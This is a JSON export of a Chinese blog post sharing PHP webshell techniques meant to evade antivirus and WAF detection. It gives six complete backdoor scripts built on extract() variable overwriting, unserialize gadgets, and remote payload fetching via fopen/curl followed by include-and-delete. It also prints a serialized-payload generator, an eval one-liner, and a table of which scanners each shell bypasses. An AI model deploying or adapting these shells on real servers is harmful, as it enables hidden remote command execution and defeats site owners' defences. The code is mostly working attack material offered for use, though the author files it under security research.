{"id":190,"date":"2022-01-18T17:34:36","date_gmt":"2022-01-18T09:34:36","guid":{"rendered":"https:\/\/aaaahui.top\/?p=190"},"modified":"2023-03-31T16:25:28","modified_gmt":"2023-03-31T08:25:28","slug":"php-webshell-bypass1","status":"publish","type":"post","link":"https:\/\/ahui.blog\/index.php\/2022\/01\/18\/php-webshell-bypass1\/","title":{"rendered":"\u5206\u4eab\u51e0\u4e2aPHP\u7684webshell\u514d\u6740\u601d\u8def"},"content":{"rendered":"

\u524d\u8a00\uff1a\u7f51\u4e0a\u7684\u514d\u6740\u601d\u8def\u6709\u4e0d\u5c11\uff0c\u4e0d\u8fc7\u5927\u90e8\u5206\u662f\u57fa\u4e8e\u6df7\u6dc6\u548c\u52a0\u5bc6\u7684\uff0c\u6211\u8fd9\u91cc\u5206\u4eab\u4e24\u4e2a\u57fa\u4e8e\u533f\u540d\u51fd\u6570\u3001\u53d8\u91cf\u8986\u76d6\u548c\u53cd\u5e8f\u5217\u5316\u7684webshell\u601d\u8def\uff0c\u601d\u8def\u6765\u6e90\u4e8e\u6df1\u4fe1\u670dEDR\u7684RCE\u6f0f\u6d1e\u3002<\/strong><\/p>\n

ps\uff1a\u8fdc\u7a0b\u83b7\u53d6\u7684\u65f6\u5019\uff0c\u5176\u5b9e\u4e5f\u53ef\u4ee5\u7528fopen\u8bfb\u53d6\u8fdc\u7a0b\u6587\u4ef6\uff0c\u66f4\u52a0\u65b9\u4fbf\u70b9\uff0c\u4f46\u662f\u611f\u89c9\u8fd9\u4e2a\u51fd\u6570\u8c8c\u4f3c\u6bd4\u8f83\u5e38\u7528\uff0c\u53ef\u80fd\u4f1a\u88ab\u4e00\u4e9bwaf\u6216\u8005\u67e5\u6740\u5de5\u5177\u67e5\u5230\uff0c\u6240\u4ee5\u7528\u5230\u4e86\u8fdc\u7a0b\u83b7\u53d6\u7684\u5730\u65b9\uff0c\u5206\u522b\u4f7f\u7528\u4e86fopen\u51fd\u6570\u548ccurl\u8fdb\u884c\u3002<\/p>\n

\u5148\u628awebshell\u5217\u51fa\u6765\uff0c\u6709\u4e0b\u9762\u51e0\u4f4d\u9009\u624b\uff1a<\/p>\n

\u2460 extract_webshell<\/h4>\n
<?php\nif($_GET['exec']==="0"){\n    exit;\n}else if($_GET['exec']==="1"){\n        call_user_func(function() {\n            $cmd = function($params){\n                extract($params);\n                $a($b);\n            };\n            $cmd($_REQUEST);\n        });\n}\n?><\/code><\/pre>\n
\u4e00\u53f7\u9009\u624b\u89e3\u6790\uff1a<\/h4>\n
\u8fd9\u4e2a\u601d\u8def\u662f\u6df1\u4fe1\u670dEDR\u53d8\u91cf\u8986\u76d6\u5bfc\u81f4RCE\u7684\u6f0f\u6d1e\uff0cextract\u51fd\u6570\u6ce8\u518c\u4e86\u6570\u7ec4\u4e2d\u7684\u952e\u4e3a\u53d8\u91cf\u540d\uff0c\u503c\u4e3a\u53d8\u91cf\u7684\u503c\uff0c\u8fd9\u91cc\u63a5\u6536$_REQUEST\uff0c\u7136\u540e\u5229\u7528\u53d8\u91cf\u51fd\u6570\u6267\u884c$a($b),\u6240\u4ee5\u53ea\u8981\u4f20\u53c2\u6570exec=1&a=system&b=whoami\uff0c\u5373\u53ef\u6267\u884c\uff0c\u7b49\u540c\u4e8esystem(whoami)<\/p>\n
\u2461 unserialize_extract_webshell<\/h4>\n
<?php\nclass test{\n    public $id = array('a'=>'1','b'=>'2');\n    function __wakeup(){\n        echo $this;\n    }\n\n    function __toString(){\n        call_user_func(function() {\n            $cmd = function($params){\n                extract($params);\n                $a($b);\n            };\n            $cmd($this->id);\n        });\n    }\n};\nif($_GET['exec']==="0"){\n    exit;\n}else if($_GET['exec']==="1"){\n    $test1 = $_GET['string'];\n    $test2 = unserialize($test1);\n}<\/code><\/pre>\n
\u4e8c\u53f7\u9009\u624b\u89e3\u6790\uff1a<\/h4>\n
\u4e8c\u53f7\u662f\u57fa\u4e8e\u4e00\u53f7\u9009\u624b\u601d\u8def\u7684\u4e00\u4e2a\u5347\u7ea7\uff0c\u5229\u7528\u53cd\u5e8f\u5217\u5316\u6765\u4f20\u53c2\u6570\uff0c\u6267\u884c\u547d\u4ee4\u7684\u903b\u8f91\u4e5f\u6bd4\u4e00\u53f7\u8981\u590d\u6742\u4e00\u70b9\uff0c\u53cd\u5e8f\u5217\u5316\u4e4b\u540e\u4f1a\u81ea\u52a8\u8c03\u7528__wakeup\u51fd\u6570\uff0c\u7136\u540eecho $this\uff0c\u4f1a\u8c03\u7528__toString\u51fd\u6570\uff0c\u7136\u540e\u7684\u6d41\u7a0b\u5c31\u548c\u4e00\u53f7\u9009\u624b\u4e00\u6837\u4e86\uff0c\u6700\u7ec8\u6211\u4eec\u9700\u8981\u4f20\u9012\u7684\u53c2\u6570\u5c31\u662fexec=1&string=O:4:"test":1:{s:2:"id";a:2:{s:1:"a";s:6:"system";s:1:"b";s:6:"whoami";}}<\/p>\n
\u2462 unserialize_extract_remote_webshell_fopen<\/h4>\n
<?php\nclass test{\n    public $id = array('a'=>'1','b'=>'2');\n    function __wakeup(){\n        echo $this;\n        exit;\n    }\n\n    function __toString(){\n        call_user_func(function() {\n            $cmd = function($params){\n                extract($params);\n                $a($b);\n            };\n            $cmd($this->id);\n        });\n    }\n};\nif($_GET['exec']==="0"){\n    exit;\n}else if($_GET['exec']==="1"){\n    $shell_addr_1="127.0";\n    $shell_addr_2=".0.1";\n    $shell_addr_3="shell.txt";\n    $file_handle = fopen("http:\/\/".$shell_addr_1.$shell_addr_2."\/".$shell_addr_3,"r");\n    $shell = fgets($file_handle);\n    $test2 = unserialize($shell);\n}<\/code><\/pre>\n
\u2462.2 unserialize_extract_remote_webshell_curl<\/h4>\n
<?php\nclass test{\n    public $id = array('a'=>'1','b'=>'2');\n    function __wakeup(){\n        echo $this;\n        exit;\n    }\n\n    function __toString(){\n        call_user_func(function() {\n            $cmd = function($params){\n                extract($params);\n                $a($b);\n            };\n            $cmd($this->id);\n        });\n    }\n};\nif($_GET['exec']==="0"){\n    exit;\n}else if($_GET['exec']==="1"){\n    $ch = curl_init();\n    $timeout = 5;\n    $shell_addr_1="127.0";\n    $shell_addr_2=".0.1";\n    $shell_addr_3="shell.txt";\n    curl_setopt ($ch, CURLOPT_URL, $shell_addr_1.$shell_addr_2."\/".$shell_addr_3);\n    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);\n    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);\n    $test1 = curl_exec($ch);\n    curl_close($ch);\n\n    $test2 = unserialize($test1);\n}<\/code><\/pre>\n
\u4e09\u53f7\u9009\u624b\u89e3\u6790\uff1a<\/h4>\n
\u4e09\u53f7\u662f\u57fa\u4e8e\u4e8c\u53f7\u9009\u624b\u601d\u8def\u7684\u4e00\u4e2a\u5347\u7ea7\uff0c\u53cd\u5e8f\u5217\u5316\u7684\u6570\u636e\u662f\u4ece\u7f51\u7edc\u4e0a\u8fdc\u7a0b\u83b7\u53d6\u7684\uff0c\u4e5f\u5c31\u76f8\u5f53\u4e8e\u547d\u4ee4\u83b7\u53d6\u5230payload\uff0c\u7136\u540e\u518d\u53cd\u5e8f\u5217\u5316\u6267\u884c\uff0c\u53ea\u9700\u8981\u5728\u6211\u4eec\u7684\u8fdc\u7a0bweb\u670d\u52a1\u5668\u4e0a\u653e\u4e0a\u6211\u4eec\u7684payload\uff0cpayload\u4e5f\u548c\u4e8c\u53f7\u9009\u624b\u4e00\u6837\uff0c\u5373\u628aO:4:"test":1:{s:2:"id";a:2:{s:1:"a";s:6:"system";s:1:"b";s:6:"whoami";}}\u653e\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u6211\u672c\u5730\u6d4b\u8bd5\u5c31\u653e\u5230\u4e86web\u6839\u76ee\u5f55\u7684shell.txt\u4e0a<\/p>\n
\u2463 include_shell_fopen<\/h4>\n
<?php\nif($_GET['exec']==="0"){\n    exit;\n}else if($_GET['exec']==="1"){\n    $shell_addr_1="127.0";\n    $shell_addr_2=".0.1";\n    $shell_addr_3="eval.txt";\n    $file_handle = fopen("http:\/\/".$shell_addr_1.$shell_addr_2."\/".$shell_addr_3,"r");\n    $shellcode = fgets($file_handle);\n\n    file_put_contents("conf_bak.ini",$shellcode);\n    include("conf_bak.ini");\n    unlink("conf_bak.ini");\n}<\/code><\/pre>\n
\u2463.2 include_shell_curl<\/h4>\n
<?php\nif($_GET['exec']==="0"){\n    exit;\n}else if($_GET['exec']==="1"){\n    $ch = curl_init();\n    $timeout = 5;\n    $shell_addr_1="127.0";\n    $shell_addr_2=".0.1";\n    $shell_addr_3="eval.txt";\n    curl_setopt ($ch, CURLOPT_URL, $shell_addr_1.$shell_addr_2."\/".$shell_addr_3);\n    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);\n    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);\n    $shellcode = curl_exec($ch);\n    curl_close($ch);\n\n    file_put_contents("conf_bak.ini",$shellcode);\n    include("conf_bak.ini");\n    unlink("conf_bak.ini");\n}<\/code><\/pre>\n
\u7528\u5230\u53cd\u5e8f\u5217\u5316\u7684\u751f\u6210\u5e8f\u5217\u5316payload\u7684\u811a\u672c\uff1a<\/strong><\/h4>\n
serialize_shellcode_creater<\/h4>\n
<?php\nclass test{\n    public $id;\n};\n$test1 = new test();\n$test1->id["a"] = "system";\n$test1->id["b"] = "whoami";\nprint(serialize($test1));<\/code><\/pre>\n
\u56db\u53f7\u9009\u624b\u89e3\u6790\uff1a<\/h4>\n
\u56db\u53f7\u9009\u624b\u662f\u57fa\u4e8e\u6587\u4ef6\u5305\u542b\u7684\u601d\u8def\uff0c\u800cphp\u7684\u8fdc\u7a0b\u5305\u542b\u9ed8\u8ba4\u662f\u4e0d\u5f00\u542f\u7684\uff0c\u6240\u4ee5\u5229\u7528\u8fdc\u7a0b\u83b7\u53d6\u4e4b\u540e\uff0c\u521b\u5efa\u6587\u4ef6\u8fdb\u884c\u5305\u542b\uff0c\u518d\u628a\u6587\u4ef6\u5220\u9664\uff0c\u6587\u4ef6\u662f\u4f1a\u5b58\u5728\u4e00\u4e0b\uff0c\u7136\u540e\u9a6c\u4e0a\u5220\u9664\u3002\u540c\u7406\uff0c\u4e5f\u8981\u628a\u666e\u901a\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\u653e\u5728\u8fdc\u7a0b\u670d\u52a1\u5668\u4e0a\uff0c\u6211\u672c\u5730\u6d4b\u8bd5\u5c31\u628a<?php @eval($_GET["cmd"]);?><\/code>\u653e\u5230\u672c\u5730web\u6839\u76ee\u5f55\u7684eval.txt\uff0c\u6700\u7ec8payload\u5c31\u662fexec=1&cmd=system("whoami");<\/p>\n
1\uff1aextract_webshell<\/p>\n
2\uff1aunserialize_extract_webshell<\/p>\n
3\uff1aunserialize_extract_remote_webshell_fopen<\/p>\n
3.2\uff1aunserialize_extract_remote_webshell_curl<\/p>\n
4\uff1ainclude_shell_fopen<\/p>\n
4.2\uff1ainclude_shell_curl<\/p>\n
\u514d\u6740\u8868\u73b0\uff1a\u8fc7\u221a\uff0c\u4e0d\u8fc7\u00d7\uff08\u6700\u65b0\u7248\u672c\uff09<\/h4>\n\n\n\n\n\n\n\n\n\n\n\n\n\n
<\/th>\n1<\/th>\n2<\/th>\n3<\/th>\n3.2<\/th>\n4<\/th>\n4.2<\/th>\n<\/tr>\n<\/thead>\n
\u767e\u5ea6WEBDIR+<\/td>\n\u221a<\/td>\n\u00d7<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n<\/tr>\n
\u6cb3\u9a6c<\/td>\n\u00d7<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u00d7<\/td>\n\u221a<\/td>\n\u00d7<\/td>\n<\/tr>\n
\u957f\u4eadwebshellchop<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u00d7<\/td>\n\u221a<\/td>\n\u00d7<\/td>\n<\/tr>\n
D\u76fe<\/td>\n\u00d7(\u7b49\u7ea73)<\/td>\n\u00d7(\u7b49\u7ea71)<\/td>\n\u00d7(\u7b49\u7ea71)<\/td>\n\u221a<\/td>\n\u00d7(\u7b49\u7ea71)<\/td>\n\u00d7(\u7b49\u7ea71)<\/td>\n<\/tr>\n
\u706b\u7ed2<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n<\/tr>\n
360<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n<\/tr>\n
\u5fae\u6b65\u5728\u7ebf<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n<\/tr>\n
VirusTotal<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n<\/tr>\n
\u5947\u5b89\u4fe1\u5a01\u80c1\u60c5\u62a5<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n\u221a<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
\u540e\u9762\u8fd9\u51e0\u4e2a\u8c8c\u4f3c\u4e3b\u8981\u662f\u68c0\u6d4b\u75c5\u6bd2\u7684\uff0c\u68c0\u6d4bwebshell\u4e5f\u53ea\u80fd\u68c0\u6d4b\u51fa\u6765\u6bd4\u8f83\u5e38\u89c1\u7684<\/strong><\/p>\n
\u57fa\u672c\u4e0a\u5e02\u9762\u4e0a\u7684\u68c0\u6d4b\u5de5\u5177\u548c\u7f51\u7ad9\u5927\u90e8\u5206\u90fd\u80fd\u8fc7\uff0c\u539f\u672c\u6211\u5199\u8fd9\u4e9b\u662f\u4e3a\u4e86\u8bd5\u4e00\u4e0b\u80fd\u4e0d\u80fd\u8fc7\u963f\u91cc\u7684\u4f0f\u9b54\u8d4f\u91d1\u8ba1\u5212\uff0c\u4f46\u662f\u6700\u7ec8\u662f\u5931\u8d25\u4e86\u3002<\/p>\n
\u80fd\u8fc7\u963f\u91cc\u4f0f\u9b54\u5f15\u64ce\u7684\u8001\u54e5\uff0c\u5982\u679c\u53ef\u4ee5\u7684\u8bdd\u80fd\u591f\u5206\u4eab\u4e0b\u601d\u8def\u611f\u6fc0\u4e0d\u5c3d\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
\u524d\u8a00\uff1a\u7f51\u4e0a\u7684\u514d\u6740\u601d\u8def\u6709\u4e0d\u5c11\uff0c\u4e0d\u8fc7\u5927\u90e8\u5206\u662f\u57fa\u4e8e\u6df7\u6dc6\u548c\u52a0\u5bc6\u7684\uff0c\u6211\u8fd9\u91cc\u5206\u4eab\u4e24\u4e2a\u57fa\u4e8e\u533f\u540d\u51fd\u6570\u3001\u53d8\u91cf\u8986\u76d6\u548c\u53cd\u5e8f\u5217\u5316\u7684we … \u9605\u8bfb\u66f4\u591a<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[16],"class_list":["post-190","post","type-post","status-publish","format-standard","hentry","category-safety_research","tag-php"],"_links":{"self":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/comments?post=190"}],"version-history":[{"count":3,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions"}],"predecessor-version":[{"id":461,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions\/461"}],"wp:attachment":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/media?parent=190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/categories?post=190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/tags?post=190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}